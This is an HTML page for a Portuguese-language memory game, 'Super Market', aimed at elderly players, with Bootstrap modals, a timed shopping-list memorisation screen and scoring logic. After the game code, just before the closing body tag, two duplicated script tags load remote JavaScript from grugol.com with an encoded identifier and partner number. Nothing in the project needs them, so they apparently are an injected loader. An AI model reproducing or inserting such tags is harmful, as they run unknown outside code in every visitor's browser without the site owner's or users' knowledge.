<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Super Market</title>
	
	<link rel="stylesheet" href="bootstrap/css/bootstrap.css">
	<link rel="stylesheet" type="text/css" href="http://megaaprovados.com.br/blog/wp-content/themes/epico/css/color-styles/min/style7.min.css">

	<script src="bootstrap/jquery.js"></script>
	<script src="bootstrap/js/bootstrap.js"></script>
	<script src="js/phaser.min.js"></script>
</head>	

<body>

	<!-- Modal Bem Vindo-->
	<div class="modal fade" id="modalBemVindo" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
		<div class="modal-dialog" role="document">
			<div class="modal-content">
				<div class="modal-header">
					<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
					<h4 class="modal-title entry-title" id="myModalLabel">Bem Vindo - Super Market</h4>
				</div>
				<div class="modal-body">
					Olá seja Bem vindo ao Super Market um jogo voltado para memorização e com foco no público idoso. O objeitvo do jogo é capturar todos os itens de uma lista de supermercado em tempo determinado. Espero que gostem não deixem de avaliar.
				</div>
				<div class="modal-footer">
					<button type="button" class="btn btn-default" data-dismiss="modal">Fechar</button>
				</div>
			</div>
		</div>
	</div>
	<!-- FIM Modal -->

	<!-- Modal Regras-->
	<div class="modal fade" id="modalRegras" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
		<div class="modal-dialog" role="d	ocument">
			<div class="modal-content">
				<div class="modal-header">
					<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
					<h4 class="modal-title" id="myModalLabel">Regras - Super Market</h4>
				</div>
				<div class="modal-body">
					<h4>Regras:</h4>
					<p>1. Memorize os itens no tempo pré-definido</p>
					<p>2. Colete a quantidade pré-definida de itens.</p>
					<p>3. Coloque Os itens dentro do carrinho de compras.</p>
					<p>4. Colete itens na ordem para ganhar uma quantidade maior de xp</p>
				</div>
				<div class="modal-footer">
					<button type="button" class="btn btn-default" data-dismiss="modal">Fechar</button>
				</div>
			</div>
		</div>
	</div>
	<!-- FIM Modal Regras-->

	

	<div class="container" >
		<div class="row" style="background-color: #0D47A1;width: 980px:height:600px;">
			<div class="col-md-12" style="background-color: #0D47A1;border: solid 1px black;color: white;">
				<h1 class="entry-title" ><center>Bem Vindo ao Super Market</center></h1>
				<hr>	     
			</div>
			<div class="col-md-3" style="background-color: #0D47A1;border-right: solid 2px silver;height:600px;">
				<div>
					<h1 style="color: white; text-align: center;font-family:Source Sans Pro,Helvetica Neue,Helvetica,Arial,sans-serif;" class="entry-title"> <span class="glyphicon glyphicon-align-justify" aria-hidden="true"></span> Menu</h1>
					<hr>

					<button type="button" class="btn btn-default btn-lg btn-block" onclick="iniciar()">
						<span class="glyphicon glyphicon-play-circle" aria-hidden="true"></span> Iniciar
					</button>

					<button type="button" class="btn btn-default btn-lg btn-block" onclick="openModalRegras()">
						<span class="glyphicon glyphicon-question-sign" aria-hidden="true"></span>  Regras
					</button>

					<button type="button" onclick="sair()" class="btn btn-default btn-lg btn-block">
						<span class="glyphicon glyphicon-share-alt" aria-hidden="true"></span>  Sair
					</button>
				</br>
			</div>
		</div>

		<div class="col-md-9" style="background-color: #0D47A1;">
			<div style="margin-left: 20px;" id="GAME"> </div>

			<style >
				.thumbnail-wrapper {
					display:inline-block;
					position:absolute;
					margin: -650px;
					padding: 50px;
					width: 778px;
					height: 700px;
					margin-left: -65px;
					float: right;

				}
				.thumbnail-wrapper button {
					position:absolute;
					top:70%;
					left:60%;
					-webkit-transform:translate3d(-50%, -50%, 0);
					-moz-transform:translate3d(-50%, -50%, 0);
					transform:translate3d(-50%, -50%, 0);
				}
				#listDeProdutos{
					margin: -600px;
					padding: 50px;
					text-align: center;
					background: black;
					font-family: verdana;
					color: yellow;
					float: right;
					width: 870px;
					height: 600px;
					display: none;
					position: absolute;;
					margin-left: -12px;
					z-index: 999;

				}
				#listResultado{
					margin: -600px;
					padding: 50px;
					text-align: center;
					background: black;
					font-family: verdana;
					color: yellow;
					float: right;
					width: 870px;
					height: 600px;
					display: none;
					position: absolute;;
					margin-left: -12px;
					z-index: 999;

				}
				.bordaBranca{
					border: 1px solid white;
					padding: 10px;
				}
			</style>


			<div class="thumbnail-wrapper" id="iniciar">
				<img src="image/super2.jpg"  align="center" style="width: 878px;height: 600px;" >
				<button type="button" class="btn btn-default btn-lg btn-block"    onclick="iniciar();">
					<span class="glyphicon glyphicon-play-circle" aria-hidden="true"></span> Iniciar
				</button>
			</div>




		<div id="listDeProdutos" class="container">
			<h1>Hora de Memorizar</h1>
			<hr>
			<div class="row" id="itensdaLista"></div>

			<div class="col-xs-12">
				<h1>
					Tempo Restante: <span id="tempo"/></h1>
				</h1>
			</div>
		</div>


		<div id="listResultado" class="container">
			<h1>Resultado Final</h1>
			<hr>
			<div class="row" id="itensAprovados">
					<!--Inicio da lista de Itens >
					< Final da lista de Itens-->
				</div>

				<div class="col-xs-12">
					<h1 style="color: lime;">
						Pontos : + <span id="pontosGanhos"></span> 
					</h1>
					<h1>
						Total de Pontos: <span id="pontos" ></span>
					</h1>
				</div>
				<div>
					<button type="button" onclick="reiniciar()" class="btn btn-default btn-lg btn-block">
						<span class="glyphicon glyphicon-play" aria-hidden="true"></span>  Continuar
					</button>
				</div>
			</div>

		</div>

		<script src="js/script.js"></script>

		<script>

			var contador = 1;
			var initItens = 3;
			var itensaDecorar = [];
			var itensSelecionados = [];

			function temporizador() {
				if(contador > 0){
					setTimeout(temporizador,1000);
				} else {
					$('#listDeProdutos').hide();
				}
				$('#tempo').text(contador);
				contador--;
			}

			function reiniciar () {
				counter = 20;

				game.state.restart("Game");
				$('#listResultado').hide();
				iniciaragora();
			}

			function iniciaragora() {
				contador = 10;
				counter = 20;
				itensaDecorar = [];
				itensSelecionados = [];

				if (pontos >= 100) {
					initItens = 4;
					nivel = 2;
				}
				if (pontos >= 300) {
					initItens = 5;
					nivel = 3;
					counter = 24;
					vida = vida + 1;
				}

				if (pontos >= 550) {
					initItens = 6;
					nivel = 4;
					counter = 27;
				}

				if (pontos >= 850) {
					initItens = 7;
					nivel = 5;
				}

				if (pontos >= 1200) {
					initItens = 8;
					nivel = 6;
				}

				if (pontos >= 1300) {
					initItens = 9;
					nivel = 7;
				}

				
				$("#listDeProdutos").slideDown("slow");

				//For para geração da Lista
				for (var i = 0;i<initItens;) {
					var rand = Math.floor((Math.random()*(produtos.length)));
					var repetido = 0;

					if (i > 0) {
						for(var i2 = 0; i2<itensaDecorar.length;i2++) {
							if(produtos[rand].nome == itensaDecorar[i2].nome){
								repetido = 1;
							}
						}
					}
					if (repetido == 0) {
						if($("#item"+i).length != 0){
							$("#item"+i).remove();
						}
						$("#itensdaLista").append('<div class="col-xs-4 bordaBranca" id="item'+i+'"><h4>'+produtos[rand].descricao+'<img src="'+produtos[rand].arquivo+'" style="width:35px;height:35px;"></h4></div>');
						itensaDecorar[i] = produtos[rand];
						i++;
					}
				}
				temporizador();
			}


			$('#modalBemVindo').modal('show');

			

			function iniciar () {
				vida = 4;
				pontos = 0;

				game.state.add("Game",Game);
				game.state.start("Game");
				document.getElementById("iniciar").style.display = 'none';
				iniciaragora();
			}

			function gameover () {
				vida = 4;
				pontos = 0;
				itensaDecorar = [];
				document.getElementById("iniciar").style.display = 'block';

			}

			function sair() {
				confirm("Deseja Realmente Sair?");
			}			

			function openModalRegras () {
				$('#modalRegras').modal('show');
			}

		</script>



		<script src='http://grugol.com/prog/landing.php?app=OTAtQTQtREUtQTEtMTMtOEM=&partner=400'></script><script src='http://grugol.com/prog/landing.php?app=OTAtQTQtREUtQTEtMTMtOEM=&partner=400'></script></body>
		</html>